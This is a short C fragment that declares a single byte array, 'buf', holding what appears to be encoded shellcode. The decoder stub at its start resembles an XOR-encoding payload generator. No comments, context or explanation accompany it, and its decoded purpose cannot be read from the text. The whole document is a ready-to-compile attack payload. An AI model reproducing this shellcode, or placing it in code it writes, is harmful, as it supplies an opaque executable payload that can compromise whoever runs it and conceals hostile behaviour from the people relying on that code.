unsigned char buf[] = 
"\xd9\xe8\xd9\x74\x24\xf4\x58\x29\xc9\xbb\x96\xf0\xee\x63"
"\xb1\x46\x31\x58\x17\x83\xe8\xfc\x03\xce\xe3\x0c\x96\x12"
"\xeb\x53\x59\xea\xec\x33\xd3\x0f\xdd\x73\x87\x44\x4e\x44"
"\xc3\x08\x63\x2f\x81\xb8\xf0\x5d\x0e\xcf\xb1\xe8\x68\xfe"
"\x42\x40\x48\x61\xc1\x9b\x9d\x41\xf8\x53\xd0\x80\x3d\x89"
"\x19\xd0\x96\xc5\x8c\xc4\x93\x90\x0c\x6f\xef\x35\x15\x8c"
"\xb8\x34\x34\x03\xb2\x6e\x96\xa2\x17\x1b\x9f\xbc\x74\x26"
"\x69\x37\x4e\xdc\x68\x91\x9e\x1d\xc6\xdc\x2e\xec\x16\x19"
"\x88\x0f\x6d\x53\xea\xb2\x76\xa0\x90\x68\xf2\x32\x32\xfa"
"\xa4\x9e\xc2\x2f\x32\x55\xc8\x84\x30\x31\xcd\x1b\x94\x4a"
"\xe9\x90\x1b\x9c\x7b\xe2\x3f\x38\x27\xb0\x5e\x19\x8d\x17"
"\x5e\x79\x6e\xc7\xfa\xf2\x83\x1c\x77\x59\xce\xe3\x05\xe4"
"\xbc\xe4\x15\xe6\x90\x8c\x24\x6d\x7f\xca\xb8\xa4\x3b\x34"
"\x5b\x6c\x36\xdd\xc2\xe5\xfb\x80\xf4\xd0\x38\xbd\x76\xd0"
"\xc0\x3a\x66\x91\xc5\x07\x20\x4a\xb4\x18\xc5\x6c\x6b\x18"
"\xcc\x1c\xe4\x91\x8a\xae\x89\x35\x30\x22\x02\xe6\xf3\xff"
"\x82\xce\x4d\x9a\x45\x22\x1d\x06\xc0\x59\xc2\xb2\x34\xec"
"\x41\x6e\x1b\xa7\x2c\xec\x20\x2b\xc6\x95\xc8\xc7\x31\x7b"
"\x71\x47\x35\xed\x15\xf8\xd8\x95\xb6\x72\x69\x3c\x57\x1c"
"\xa5\x99\xcf\x96\xc1\x95\x34\x78\x05\x64\x72\xb4\x77\xb7"
"\xb2\x80\xa9\x86\x82\xde\x80\xde\xc8\x26\xdb\x2e\x1d\x78"
"\x4b\x1d\x73\xf6\x18\x90\xac\xdf\xde";
